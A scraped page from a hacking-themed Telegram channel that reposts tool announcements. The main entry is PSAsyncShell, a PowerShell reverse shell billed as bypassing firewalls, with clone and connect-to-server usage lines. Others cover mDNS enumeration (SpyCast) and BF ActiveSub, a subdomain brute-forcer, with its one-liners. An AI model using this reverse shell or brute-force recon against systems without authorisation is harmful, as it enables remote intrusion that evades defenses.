Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Kali Linux Tutorials
PSAsyncShell : PowerShell Asynchronous TCP Reverse Shell

PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing to bypass some firewalls and some countermeasures against this kind of remote connections.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.

Requirements

* PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h
_ _ _ _ _ | _ \/ | / \ _ _ _ _ / || |_ | | | | |) ___ \ / _ \ / | | | | ‘_ \ / ___ | ‘_ \ / _ \ | |
| / ) / \_ \ || | | | | (_ ) | | | | / | | || |// __/_, || ||___|/|| ||__||| |/
———————- by @JoelGMSec ———————–
Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls
Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client
.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server
Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don’t use MultiPart
Download

___________________________
@hacking_Attack
@Hacking_Video
HTTRACK — MAKE ANY WEBSITE OFFLINE

Hallo kembali lagi dengan saya, pada tulisan saya kali ini kita akan mencoba melakukan hal yang menarik. di sini saya akan menunjukkan…Continue reading on Medium »
Read more...
Aurora Improper Input Sanitization Bugfix Review

SummaryContinue reading on Immunefi »
Read more...
SpyCast is a crossplatform mDNS (https://www.kitploit.com/search/label/mDNS) enumeration (https://www.kitploit.com/search/label/Enumeration) tool that can work either in active (https://www.kitploit.com/search/label/Active) mode by recursively querying services, or in passive mode by only listening to multicast packets.
Building cargo build --release OS specific bundle packages (for example dmg and app bundles on OSX) can be built via: cargo tauri build SpyCast can also be built without the default UI, in which case all output will be printed on the terminal: cargo build --no-default-features --release Running Run SpyCast in active mode (it will recursively query all available mDNS services): ./target/release/spycast Run in passive mode (it won't produce any mDNS traffic (https://www.kitploit.com/search/label/Traffic) and only listen for multicast packets): ./target/release/spycast --passive Other options Run spycast --help for the complete list of options. License This project is made with by @evilsocket (https://twitter.com/evilsocket) and it is released under the GPL3 license.
Download Spycast (https://github.com/evilsocket/spycast)

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Recon Tool: BF ActiveSub

Recon Tool: BF ActiveSubPost Views: 42 Premium Contenthttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/09/Patreon.png Subscribe to Patreon to watch this episode.
Reading Time: 3 Minutes Subdomain Brute-Force The Pure and Fast Programming WayA Subdomain enumeration tool that supports active attack mode (not passive recon) written by Black Hat Ethical Hacking What is Subdomain Enumeration/Brute-Force?Brute force means guessing possible combinations of the target until the expected output is discovered. So, in the subdomain context, the brute-forcing is to try the possible combination of words, alphabets, and numbers before the main domain in order to get a subdomain that is resolved to IP address. Sometimes subdomains are not indexed on search engines and are not available on online DNS aggregators sites in that case brute forcing is the best way to find out the subdomains which may have been forgotten by the organization. It is like a treasure for an adversary.

Our tool has 0 false positives as it verifies it before bringing the result, and is focused on active scanning rather than passive.

It will resolve if the Host is Alive and Output the Results after bruteforcing using Pipe for Speed – Bounty Quick Technique
See Also: So you want to be a hacker? Complete Offensive Security and Ethical Hacking Course About this ToolBF ActiveSub is a tool written by us in Bash. It was written for internal use to find more subdomains when performing Recon. ‘host’ is a Linux command that resolves a host if it’s alive by providing it with an IP. After brute-forcing it from a wordlist provided, that checks prefixes of 500/5000 top combinations. The way it’s written as we know stdin and stderr can be controlled, so we redirect it to &> /dev/null; which in the terminal world, it’s like black hole, and then after resolving if it exists, outputs the result in your terminal, or save it to a new list.

This is an Active Recon scan, and not Passive.

Pure BF, and allows you to get even more targets when you are performing Bug Bounty or Pentesting and you know you want to be different from just getting the same results everyone gets, using the same default tools and configs that will maximize your potential bounty, since you will have more subdomains to work with than others, and speed is very important in such action. Installation* Requirements: apt-get install lolcatapt-get install figlet* Installation git clone https://github.com/blackhatethicalhacking/bf_active_sub.gitcd bf_active_subchmod +x bheh_bf_sub.shTrending: OSINT Tool: Social Hunter
Trending: Offensive Security Tool: DDoS-Layer7-bheh Instructions and Usage ExampleTake a list that we provide, add a domain, and it will bruteforce it

Basically, using the below examples, you can perform in various one-liners since it supports piping as follows:

* Usage Example With Output in your Terminal: cat 500_Top_Prefix_subdomains.txt | ./bheh_bf_sub.sh example.comcat 5000_Top_Prefix_subdomains.txt | ./bheh_bf_sub.sh example.com* Usage Example With Output Saved in a new File: cat 500_Top_Prefix_subdomains.txt | ./bheh_bf_sub.sh example.com > resolved_domains.txtcat 5000_Top_Prefix_subdomains.txt | ./bheh_bf_sub.sh example.com > resolved_domains.txtIf you want to save the results, then simply add: > results.txt after your one-liner.

i.e: cat 500_Top_Prefix_subdomains.txt | ./bheh_bf_sub.sh example.com > resolved_domains.txt > results.txtScreenshotshttps://www.blackhatethicalhacking.com/wp-content/uploads/2022/09/68747470733a2f2f696d6775722e636f6d2f64484145626e4e2e706e67-1024x458.png https://www.blackhatethicalhacking.com/wp-content/uploads/2022/09/19[...]